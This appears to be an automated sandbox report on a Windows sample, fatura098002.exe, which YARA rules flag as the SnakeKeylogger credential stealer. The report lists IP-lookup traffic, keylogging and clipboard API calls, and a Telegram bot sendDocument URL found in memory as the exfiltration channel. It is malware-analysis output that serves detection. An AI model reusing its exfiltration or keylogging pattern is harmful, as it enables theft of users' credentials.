Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: RegSvcs.exe, 00000003.00000002.2653936618.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2653419827.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 00000003.00000002.2653936618.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2653419827.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.comd
Source: RegSvcs.exe, 00000003.00000002.2653936618.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2653936618.0000000002ABE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2653419827.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2653419827.0000000002A9E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000003.00000002.2653936618.0000000002AA3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2653936618.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2653419827.0000000002A31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: RegSvcs.exe, 00000003.00000002.2653936618.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2653419827.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/d
Source: gehlenite.exe, 00000002.00000002.1437975448.0000000001B80000.00000004.00001000.00020000.00000000.sdmp, gehlenite.exe, 00000005.00000002.1560202183.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2652146138.0000000000413000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000003.00000002.2653936618.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2653419827.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.orgd
Source: RegSvcs.exe, 00000003.00000002.2653936618.0000000002AED000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2653419827.0000000002ACD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: RegSvcs.exe, 00000003.00000002.2653936618.0000000002AED000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2653419827.0000000002ACD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.orgd
Source: RegSvcs.exe, 00000003.00000002.2653936618.0000000002AA3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2653419827.0000000002A31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: gehlenite.exe, 00000002.00000002.1437975448.0000000001B80000.00000004.00001000.00020000.00000000.sdmp, gehlenite.exe, 00000005.00000002.1560202183.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2652146138.0000000000413000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: RegSvcs.exe, 00000003.00000002.2653936618.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2653419827.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: gehlenite.exe, 00000002.00000002.1437975448.0000000001B80000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2653936618.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, gehlenite.exe, 00000005.00000002.1560202183.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2653419827.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2652146138.0000000000413000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000003.00000002.2653936618.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2653419827.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
Source: RegSvcs.exe, 00000003.00000002.2653936618.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2653419827.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l

Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 2.2.gehlenite.exe.1b80000.1.raw.unpack, UltraSpeed.cs	.Net Code: VKCodeToUnicode
Source: 5.2.gehlenite.exe.5a0000.0.raw.unpack, UltraSpeed.cs	.Net Code: VKCodeToUnicode

Source: C:\Users\user\Desktop\fatura098002.exe

Code function: 0_2_0077EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_0077EAFF

Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_0077ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		0_2_0077ED6A
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006BED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		2_2_006BED6A

Source: C:\Users\user\Desktop\fatura098002.exe

0_2_0077EAFF

Source: C:\Users\user\Desktop\fatura098002.exe

Code function: 0_2_0076AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_0076AA57

Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00799576 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		0_2_00799576
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006D9576 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		2_2_006D9576

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.gehlenite.exe.1b80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.gehlenite.exe.1b80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.gehlenite.exe.5a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.gehlenite.exe.5a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.gehlenite.exe.1b80000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.gehlenite.exe.1b80000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.gehlenite.exe.5a0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.gehlenite.exe.5a0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000005.00000002.1560202183.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000005.00000002.1560202183.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000002.00000002.1437975448.0000000001B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.1437975448.0000000001B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000003.00000002.2652141073.0000000000403000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: gehlenite.exe PID: 7584, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 7624, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: gehlenite.exe PID: 7840, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Binary is likely a compiled AutoIt script file

Source: fatura098002.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: fatura098002.exe, 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_6aa4ce27-8
Source: fatura098002.exe, 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_becc9eec-1
Source: gehlenite.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: gehlenite.exe, 00000002.00000002.1436758952.0000000000702000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_deacab98-a
Source: gehlenite.exe, 00000002.00000002.1436758952.0000000000702000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_5198ec26-4
Source: gehlenite.exe, 00000005.00000002.1560273302.0000000000702000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_f2dadf93-f
Source: gehlenite.exe, 00000005.00000002.1560273302.0000000000702000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_ba7ffff1-3

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00703170 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,	0_2_00703170
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_0079A2D7 NtdllDialogWndProc_W,	0_2_0079A2D7
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_007987B2 NtdllDialogWndProc_W,CallWindowProcW,	0_2_007987B2
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00798AAA NtdllDialogWndProc_W,	0_2_00798AAA
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00798B02 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,	0_2_00798B02
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00718BA4 NtdllDialogWndProc_W,	0_2_00718BA4
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00798D0E PostMessageW,GetFocus,GetDlgCtrlID,NtdllDialogWndProc_W,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,	0_2_00798D0E
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00798FC9 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,	0_2_00798FC9
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00719052 NtdllDialogWndProc_W,	0_2_00719052
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_007190A7 NtdllDialogWndProc_W,	0_2_007190A7
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_007990A1 SendMessageW,NtdllDialogWndProc_W,	0_2_007990A1
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_0079911E DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,	0_2_0079911E
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_007993CB NtdllDialogWndProc_W,	0_2_007993CB
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00799380 NtdllDialogWndProc_W,	0_2_00799380
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00799400 ClientToScreen,NtdllDialogWndProc_W,	0_2_00799400
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00799576 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	0_2_00799576
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_0079953A GetWindowLongW,NtdllDialogWndProc_W,	0_2_0079953A
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_007197C0 GetParent,NtdllDialogWndProc_W,	0_2_007197C0
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_0071997D NtdllDialogWndProc_W,GetSysColor,SetBkColor,745CC8D0,NtdllDialogWndProc_W,	0_2_0071997D
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00799E74 NtdllDialogWndProc_W,	0_2_00799E74
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00799EF3 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,	0_2_00799EF3
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00799F86 GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,	0_2_00799F86
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_00643170 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,	2_2_00643170
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006DA2D7 NtdllDialogWndProc_W,	2_2_006DA2D7
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006D87B2 NtdllDialogWndProc_W,CallWindowProcW,	2_2_006D87B2
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006D8AAA NtdllDialogWndProc_W,	2_2_006D8AAA
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006D8B02 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,	2_2_006D8B02
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_00658BA4 NtdllDialogWndProc_W,	2_2_00658BA4
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006D8D0E PostMessageW,GetFocus,GetDlgCtrlID,NtdllDialogWndProc_W,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,	2_2_006D8D0E
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006D8FC9 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,	2_2_006D8FC9
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_00659052 NtdllDialogWndProc_W,	2_2_00659052
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006590A7 NtdllDialogWndProc_W,	2_2_006590A7
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006D90A1 SendMessageW,NtdllDialogWndProc_W,	2_2_006D90A1
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006D911E DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,	2_2_006D911E
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006D93CB NtdllDialogWndProc_W,	2_2_006D93CB
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006D9380 NtdllDialogWndProc_W,	2_2_006D9380
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006D9400 ClientToScreen,NtdllDialogWndProc_W,	2_2_006D9400
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006D9576 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	2_2_006D9576
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006D953A GetWindowLongW,NtdllDialogWndProc_W,	2_2_006D953A
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006597C0 GetParent,NtdllDialogWndProc_W,	2_2_006597C0
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_0065997D NtdllDialogWndProc_W,GetSysColor,SetBkColor,745CC8D0,NtdllDialogWndProc_W,	2_2_0065997D
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006D9E74 NtdllDialogWndProc_W,	2_2_006D9E74
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006D9EF3 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,	2_2_006D9EF3
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006D9F86 GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,	2_2_006D9F86

Source: C:\Users\user\Desktop\fatura098002.exe

Code function: 0_2_0076D5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_0076D5EB

Source: C:\Users\user\Desktop\fatura098002.exe

Code function: 0_2_00761201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,74765590,CreateProcessAsUserW,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,

0_2_00761201

Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_0076E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		0_2_0076E8F6
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006AE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		2_2_006AE8F6

Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00708060	0_2_00708060
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00772046	0_2_00772046
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00768298	0_2_00768298
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_0073E4FF	0_2_0073E4FF
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_0073676B	0_2_0073676B
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00794873	0_2_00794873
